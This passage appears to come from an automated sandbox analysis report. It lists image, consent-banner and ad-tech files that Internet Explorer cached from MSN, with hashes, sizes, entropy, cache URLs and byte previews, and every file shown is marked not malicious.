Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	downloaded
Size (bytes):	30084
Entropy (8bit):	7.955889426852974
Encrypted:	false
SSDEEP:	768:77vgc+spX0FfVIq5EYpXX9rhIiit4C0HS0LY9U:7J0FfVyYpH9rhAt4C0HS/C
MD5:	D9684BA6D368537ACA9B8DB1962BCB52
SHA1:	4F81044B90981D24EE92DD60139FA44BF234525F
SHA-256:	1D22F57891AA9CE37135E0DB745C16A2590D25A8ADE7FC5B0E3DEE4E7EAAA92A
SHA-512:	910FB7901661F29C24B19DDC54B99D124B5F6F118A155343259A98D837BA6510FA70A2B86867D49D457730932AF21E6E7FBEE52F4C514CE7FFB0A3BE465CC8E0
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dzReS.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...E8M... E.Q..U$..o..9.yK..A.)........a&.&.m2.:.n...(..L# ..S.tM...G\.V\...GJ_..G'..5.z.....%e...O.L.f...[..\|.c.h.R.&...W.Q.I..3...j..?.Xt..M.i..CY.oV.a1.a.65...g-..z.5-........T..9...u....8`..B5g..$...Zoa.]....md..6.....Ny........REu..Q.............K-.-1Z...E.!4.Lc@.4.i....!......y0.....E...M)\..%..C;..$T.ZD/t..].......".o.H.\...-".....5..jl.W<.;.O.$-

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB5kTiV[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	289
Entropy (8bit):	6.71059176367892
Encrypted:	false
SSDEEP:	6:6v/lhPkR/CnFCPPAV91E0lXO6Vq9eu7H1Cnstf0PLAYVwmqvnTp:6v/78/kFCPPWGKVq77HksN2xSmqvn9
MD5:	10ADF331F5D133B42D542F39E2A1390E
SHA1:	D0EEA0DEE8B46CB250E303BC1AA6C01EDFEF590C
SHA-256:	AD4808FAC10A5F71AAC3B93BBB0D29D575CEFF5609CEC3886C079F542F455D33
SHA-512:	7D93C192B7B055BC8CDB079A1D4F935A25A114986A592977A869EB0E5941FC4E271263EF275325B5193E7D460810AD575CF1846141128BAB7D5425EA24E170C8
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB5kTiV.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J.....IDAT8O..1N.`..`..O[.t`.U.XX..;'`.H\.S..^.."ui...{&.w@B.&o.q..p..W..t....E.....s..\.j_.x.>C-.7&..'.m..P<HC....8C....9.....sP.u.(.36\|_].!..D.G."zT.a\|z^ ........e..._.X.>9.C...Q....B....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBUE92F[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	708
Entropy (8bit):	7.5635226749074205
Encrypted:	false
SSDEEP:	12:6v/78/gMGkt+fwrs8vYfbooyBf1e7XKH5bp6z0w6TDy9xB0IIDtqf/bU9Fqj1yfd:XGVw9oiNH5pbPDy9xmju/AXEyfYFW
MD5:	770E05618413895818A5CE7582D88CBA
SHA1:	EF83CE65E53166056B644FFC13AF981B64C71617
SHA-256:	EEC4AB26140F5AEA299E1D5D5F0181DDC6B4AC2B2B54A7EE9E7BA6E0A4B4667D
SHA-512:	B01D7D84339D5E1B3958E82F7679AFD784CE1323938ECA7C313826A72F0E4EE92BD98691F30B735A6544543107B5F5944308764B45DB8DE06BE699CA51FF7653
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBUE92F.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs...%...%.IR$....YIDAT8OM..LA...~..."".q...X........+"q@...A...&H..H...D.6..p.X".......z.d.f......rg.?.....v7.....\.{eE..LB.rq.v.J.:tv...w.....g../.ou.]7........B..{..\|.S.......^....y......c.T.L...(.dA..9.}.....5w.N......>z.<..:.wq.-......T..w.8-.>P...Ke....!7L......I...?.mq.t....?..'.(....'j.......L<)L%........^..<..=M...rR.A4..gh...iX@co..I2....`9}...E.O.i?..j5.\|$.m..-5....Z.bl...E......'MX[.M.....s...e..7..u<L.k.@c......k..zzV....O..........e.,.5.+%.,,........!.....y;..d.mK..v.J.C..0G:w...O.N...........J....\|....b:L=...f:@6T[...F..t......x.....F.w..3....@.>.......!..bF.V..?u.b&q.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBZbaoj[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	345
Entropy (8bit):	6.7032489389065
Encrypted:	false
SSDEEP:	6:6v/lhPkR/W/6TMm3lOPxUxYa5aoojWFWwoaSSHNVrMTL9opqn+vp:6v/78/W/6TMm30xNaEoo6TSWNVKoK0
MD5:	78BE86D65B6DC7DB0D71CD379A9BC492
SHA1:	1B01C9DB16886EA0E092FB9A35A5F630D2B02806
SHA-256:	62269816D79DAD6C6E726F4F326A68C12A8C885A6F7660822A2614F8030C0641
SHA-512:	EDB389EB371EDCE77FF18B1AAA4CEB605FE445AAFFBAF4BE16116F62EF143DA68A58B61B80F3CDAAE63B7168C0E7DA065E4EE9351C2CC7A1373461D0664ECD71
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8Oc\|.".........X]..o..,...A../..~....!... ..=.<T.&.....P.....?.......d;.0...id..._?1\|...A..}......"(.@.CW......_..Ae...0.f.....x.w:.........1.8........`..,!. P:../......DFn>.N..0f..q...`.e..9.% .-.a.kR.....U....~.....tnd`..:If....(....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\a5ea21[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	758
Entropy (8bit):	7.432323547387593
Encrypted:	false
SSDEEP:	12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
MD5:	84CC977D0EB148166481B01D8418E375
SHA1:	00E2461BCD67D7BA511DB230415000AEFBD30D2D
SHA-256:	BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
SHA-512:	F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Preview:	.PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20808
Entropy (8bit):	5.301544177099164
Encrypted:	false
SSDEEP:	384:RkAGcVXlblcqnzleZSug2f5vzBgF3OZORQWwY4RXrqt:g86qhbz2RmF3OsRQWwY4RXrqt
MD5:	00593785BE18A01F5D591B270BE7794E
SHA1:	B2D6DFE036CAA0CCFF1DC25CDFD8C1488D086BE8
SHA-256:	5B9547D49C57F24E7FC08CB73A03E3F9EDDDC573610D2B3894B85781DD81703E
SHA-512:	210E3849EE1113DFD7F949AC3FDFA3E77E3651716D06496DBC288EF67C7540F326668DAC8D6EE5CBE86147E830BB24533899C5E0276C9F8EEA008DE9211F7435
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20808
Entropy (8bit):	5.301544177099164
Encrypted:	false
SSDEEP:	384:RkAGcVXlblcqnzleZSug2f5vzBgF3OZORQWwY4RXrqt:g86qhbz2RmF3OsRQWwY4RXrqt
MD5:	00593785BE18A01F5D591B270BE7794E
SHA1:	B2D6DFE036CAA0CCFF1DC25CDFD8C1488D086BE8
SHA-256:	5B9547D49C57F24E7FC08CB73A03E3F9EDDDC573610D2B3894B85781DD81703E
SHA-512:	210E3849EE1113DFD7F949AC3FDFA3E77E3651716D06496DBC288EF67C7540F326668DAC8D6EE5CBE86147E830BB24533899C5E0276C9F8EEA008DE9211F7435
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\de-ch[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	76785
Entropy (8bit):	5.343242780960818
Encrypted:	false
SSDEEP:	768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCFPQtihPxVUYUEJ0YAtF:olLEJxa4CmdiuWloIti1wYm7B
MD5:	DBACAF93F0795EB6276D58CC311C1E8F
SHA1:	4667F15EAB575E663D1E70C0D14FE2163A84981D
SHA-256:	51D30486C1FE33A38A654C31EDB529A36338FBDFA53D9F238DCCB24FF42F75AF
SHA-512:	CFC1986EF5C82A9EA3DCD22460351DA10CF17BA6CDC1EE8014AAA8E2A255C66BB840B0A5CC91E0EB42E6FE50EC0E2514A679EA960C827D7C8C9F891E55908387
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
Preview:	{"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\http___cdn.taboola.com_libtrc_static_thumbnails_27937c3776dc5ac06745246ca617e1e0[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	28475
Entropy (8bit):	7.983045137801868
Encrypted:	false
SSDEEP:	768:DxlAgUJLCqbnRnVw45tG5it/bCalS2d7VrrhEgKQHBjiY:DxlXGLCqbnRn5tzgaldJhEjQB
MD5:	57DDC07B072E9FC0E1737D60EF3ACC5B
SHA1:	73051EF60F3B3ABA4E40EA9E3A30195E2350579C
SHA-256:	AEBD9495CEF739B5E90B39F80CC66FE1D8A6920C9D0F137AC8148B78C456C089
SHA-512:	156132399C0349D35CE224616C57B296539F2F8414A3D1D96F66BAE7BB7DAA5288CE64BE430495CDF4DB7BF7056B2DB42E1C486A5E9982126AFB735777EBE843
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F27937c3776dc5ac06745246ca617e1e0.jpeg
Preview:	......JFIF.....................................................................&""&0-0>>T.............................)......)$,$!$,$A3--3AK?<?K[QQ[rlr.........7...............7....................................................................<...5.....i5..K..a..VQ...I-Y\T.`.X.Q`..hKB.,.. J!....\|.\..s.;(........b..3c A.+..\.S.1KM..\....C.#.>...]ekHD.2l.Y.o.=..4\|..v.Vz.]....A1.0'!.b.;..V..$.h.`.x...'F..PL._.H....s)Va.7\.B.o!.S...7...\.b..`6.>.t9.n..}V.:/...=l...D....*....m\......4..Q..G.....b.v.BJ..#.Ov..8........oQ..k.[..Y9...K.;..f..v.....oYD..X!o.v..J1..Sk..Wf.!.$.7..;.....BY...I..Rw...S..h.....Tb..L..hM.d.[.I}C...UY.d...e.....7e...z...u^q..3u.u....].Qw .S^O.xjM.).........j.~\|7S.&..._..I..~.$....j.$...c.......#.h..j..lOz."h<]..]..!]....+.............^G1..@.54FR!r.(.K.Z.1U.p.I...%6.._f...$...0.mZ.....3.{3X.....F..M...]nc.N...T...3.F..N.....8$.S......!..,..}Z..p.v{.R....(.3..:a=rCp.0rw..ai....:3ib.uj.~..........C.D.Vh..Qo.i.RRl.8@)&.....X.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\http___cdn.taboola.com_libtrc_static_thumbnails_e1cb3d470d2ea8d4eeaa2ba5fe623782[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	21709
Entropy (8bit):	7.975088991833091
Encrypted:	false
SSDEEP:	384:ItGZHurRtIRrTO0KPYiFlJOEYjm6Jd6nWGH7CJvGP5Dzc/x8nKO:ItpRtuy0KPYqagYV2CJ6DYJs
MD5:	0DEB4D7596372D285BEBB0A1E6B6A21F
SHA1:	EDF7988AD1BCDEA61CE9C34EBD0970EF06A0A8F6
SHA-256:	32FA55A0171E0328B9DCB990889245B9507DB6AAEE4F871DB051FE9825D7A84B
SHA-512:	D448CC38C0A32FDB6428778E964FAA330975F99271E5BF5C88FFE3541F8890EAE14ADBEFE20EA2A476E0F3B36A2E4D2E2A6D9F6B84A97DCE7E6DA035C3A5756B
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fe1cb3d470d2ea8d4eeaa2ba5fe623782.png
Preview:	......JFIF.....................................................................&""&0-0>>T.......................................................&""&0-0>>T......7...."..........8......................................................................Z.^..$./.;6.......[.RIy.................J!vo..Ny.Z.QvZT.6..&.2I...$.%.1.CMT.F.`..'.$.$.$.....h3.."Y....I%.R_C...{.....E.SU..v}.H.....m.=...gi..F.....]V+.I$.cu...4gI.[.<..+...6.G.j.q:e.M.).$..Z..Ah..(.d.&5im&..`....of.#.A..\|.OS....h{.......7.0S_Y.W.............Q...18....qB2..B~....Z....c..F.De...s.....V....n.HA..W.l^.K..C..41..#.....w..o..5.3r...I/Z.&Iz.u.ZI..0..1.R.....`T{D......k..q...nd>.\.....y.D...=....o.y........,P,.Oj..m.....@CcP<m.....~..a.7..i_..s...s...O.}T.G.e\|.W..u.%&...r.09}....4&..r}T.v.7.q1...Sinh....Y............~q...h/..I.......0.$..w.........#..s9.k..&A.t".....j....5..Wm..7s...,x.Q..n......G.F.^E...-..d..C...;..KQ._....m.Yz.j...IR5.......~...XO.,,?Q...d+v..........:)``.....-.3*.D..m..Z.q

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\medianet[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	384562
Entropy (8bit):	5.484542203934184
Encrypted:	false
SSDEEP:	6144:4o99Tw5qIZvbzH0m9ZnGQVvgz5RCu1bpa3Cv7IW:vIZvvPnGQVvgnxVw3E7IW
MD5:	BEF507099A5BE6248176F9D5E688AD81
SHA1:	D0A7A0662DABC57EBD3EEFB675C51833FE84E9D3
SHA-256:	EED9E54CA824A985205B5A9A1C4AAAD587E7D7F33274616CBF50318B861B108B
SHA-512:	69DDF0C6B9898E2FC699C935AD8A86FE575A10EA110217B8AEDE626260D0631D63E421BBAD82C27BC64C8810382365D016AC8812447C1B621D6935386121ED88
Malicious:	false
IE Cache URL:	https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl\|\|"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON\|\|"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\otPcCenter[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	46394
Entropy (8bit):	5.58113620851811
Encrypted:	false
SSDEEP:	384:oj+X+jzgBCL2RAAaRKXWSU8zVrX0eQna41wFpWge0bRApQZInjatWLGuD3eWrwAs:4zgEFAJXWeNeIpW4lzZInuWjlHoQthI
MD5:	145CAF593D1A355E3ECD5450B51B1527
SHA1:	18F98698FC79BA278C4853D0DF2AEE80F61E15A2
SHA-256:	0914915E9870A4ED422DB68057A450DF6923A0FA824B1BE11ACA75C99C2DA9C2
SHA-512:	D02D8D4F9C894ADAB8A0B476D223653F69273B6A8B0476980CD567B7D7C217495401326B14FCBE632DA67C0CB897C158AFCB7125179728A6B679B5F81CADEB59
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/otPcCenter.json
Preview:	.. {.. "name": "otPcCenter",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3RQY0NlbnRlciBvdC1oaWRlIG90LWZhZGUtaW4iIGFyaWEtbW9kYWw9InRydWUiIHJvbGU9ImRpYWxvZyIgYXJpYS1sYWJlbGxlZGJ5PSJvdC1wYy10aXRsZSI+PCEtLSBDbG9zZSBCdXR0b24gLS0+PGRpdiBjbGFzcz0ib3QtcGMtaGVhZGVyIj48IS0tIExvZ28gVGFnIC0tPjxkaXYgY2xhc3M9Im90LXBjLWxvZ28iIHJvbGU9ImltZyIgYXJpYS1sYWJlbD0iQ29tcGFueSBMb2dvIj48L2Rpdj48YnV0dG9uIGlkPSJjbG9zZS1wYy1idG4taGFuZGxlciIgY2xhc3M9Im90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIj48L2J1dHRvbj48L2Rpdj48IS0tIENsb3NlIEJ1dHRvbiAtLT48ZGl2IGlkPSJvdC1wYy1jb250ZW50IiBjbGFzcz0ib3QtcGMtc2Nyb2xsYmFyIj48aDMgaWQ9Im90LXBjLXRpdGxlIj5Zb3VyIFByaXZhY3k8L2gzPjxkaXYgaWQ9Im90LXBjLWRlc2MiPjwvZGl2PjxidXR0b24gaWQ9ImFjY2VwdC1yZWNvbW1lbmRlZC1idG4taGFuZGxlciI+QWxsb3cgYWxsPC9idXR0b24+PHNlY3Rpb24gY2xhc3M9Im90LXNkay1yb3cgb3QtY2F0LWdycCI+PGgzIGlkPSJvdC1jYXRlZ29yeS10aXRsZSI+TWFuYWdlIENvb2tpZSBQcmVmZXJlbmNlczwvaDM+PGRpdiBjbGFzcz0ib3QtcGxpLWhkciI+PHNwYW4gY2xhc3M9Im90LWxpLXRpdGxlIj5Db25zZW50PC9

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\otSDKStub[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	13479
Entropy (8bit):	5.3011996311072425
Encrypted:	false
SSDEEP:	192:TQp/Oc/tBPEocTcgMg97k0gA3wziBpHfkmZqWoa:8R9aTcgMNADXHfkmvoa
MD5:	BC43FF0C0937C3918A99FD389A0C7F14
SHA1:	7F114B631F41AE5F62D4C9FBD3F9B8F3B408B982
SHA-256:	E508B6A9CA5BBAED7AC1D37C50D796674865F2E2A6ADAFAD1746F19FFE52149E
SHA-512:	C3A1F719F7809684216AB82BF0F97DD26ADE92F851CD81444F7F6708BB241D772DBE984B7D9ED92F12FE197A486613D5B3D8E219228825EDEEA46AA8181010B9
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.js
Preview:	var OneTrustStub=function(t){"use strict";var l=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.genVendorsData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}},e=(i.prototype.initConsentSDK=function(){this.initCustomEventPolyfill(),this.ensureHtmlGroupDataInitialised(),this.updateGtmMacros(),this.fetchBannerSDKDependency()},i.prototype.fetchBanner

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\AA7XCQ3[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	635
Entropy (8bit):	7.5281021853172385
Encrypted:	false
SSDEEP:	12:6v/78/kFN1fjRk9S+T8yippKCX5odDjyKGIJ3VzvTw6tWT8eXVDUlrE:uPkQpBJo1jyKGIlVzvTw6tylKE
MD5:	82E16951C5D3565E8CA2288F10B00309
SHA1:	0B3FBF20644A622A8FA93ADDFD1A099374F385B9
SHA-256:	6FACB5CD23CDB4FA13FDA23FE2F2A057FF7501E50B4CBE4342F5D0302366D314
SHA-512:	5C6424DC541A201A3360C0B0006992FBC9EEC2A88192748BE3DB93B2D0F2CF83145DBF656CC79524929A6D473E9A087F340C5A94CDC8E4F00D08BDEC2546BD94
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA7XCQ3.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J.....IDAT8O..Kh.Q...3.d.I.$m..&1...[....g.AQwb."t.JE.].V.7.n\Y....n...Z.6-bK7..J. ..6M....3....{......s...3.P..E....W_....vz...J..<.....L.<+..}......s..}>..K4....k....Y."/.HW*PW...lv.l....\..{.y....W.e..........q".K.c.....y..K.'.H....h.....[EC..!.}+.........U...Q..8.......(./....s..yrG.m..N.=......1>;N...~4.v..h:...'.....^..EN...X..{..C2...q...o.#R ......+.}9:~k(.."........h...CPU..`..H$.Q.K.)"..iwI.O[..\.q.O.<Dn%..Z.j)O.7. a.!>.L.......$..$..Z\..u71......a...D$..`<X.=b.Y'...../m.r.....?...9C.I.L.gd.l..?.......-.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\AAHSHyS[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	676
Entropy (8bit):	7.481448439265642
Encrypted:	false
SSDEEP:	12:6v/78/4kPM/accZL3bmjRJjl40rS5O3xVif5rU4oT+K7pVaEyT:N0/38DbmjRJhhPIf5rO+K33yT
